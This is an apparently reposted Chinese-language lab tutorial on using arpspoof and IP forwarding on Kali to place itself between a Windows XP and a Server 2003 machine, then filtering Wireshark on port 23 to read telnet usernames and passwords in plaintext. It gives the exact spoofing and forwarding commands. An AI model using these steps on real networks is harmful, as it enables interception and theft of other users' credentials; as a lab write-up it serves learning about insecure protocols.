Wireshark嗅探抓取telnet明文賬戶密碼


0x00

Wireshark(前稱Ethereal)是一個網絡封包分析軟件。網絡封包分析軟件的功能是擷取網絡封包,並盡可能顯示出最為詳細的網絡封包資料。Wireshark使用WinPCAP作為接口,直接與網卡進行數據報文交換。

我們可以利用arpspoof攔截轉發同一網段下其他用戶流量,再使用Wireshark來分析查看流量

配置環境:

攻擊端:kali 

靶機端:2003 xp

0x01

首先確保三台機在同一網段下

 

kali IP為192.168.1.3

XP IP為192.168.1.2

2003 IP為192.168.1.1

kali開啟流量轉發

1 cat /proc/sys/net/ipv4/ip_forward       查看瀏覽轉發,如果是0就是沒有開啟,1是開啟
2 0    可以看到沒有開啟
3 echo 1 > /proc/sys/net/ipv4/ip_forward      修改為1
4 這是時候我們的流量轉發就能開啟,別人的流量經過我這里也能轉發出去

 接下來就是嗅探轉發獲取流量了

這里用到arpspoof來轉發流量

1 arpspoof -i (自己網卡) -t  目標IP  網關

 

 打開Wireshark點開自己arpspoof配置的網卡

xp通過telnet連接2003

 

 回到Wireshark開始過濾

過濾規則

1 ip.addr==目標IP && tcp.port==23

 

 

 

 xp通過telnet連接2003時的明文賬戶密碼直接暴露出來了


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM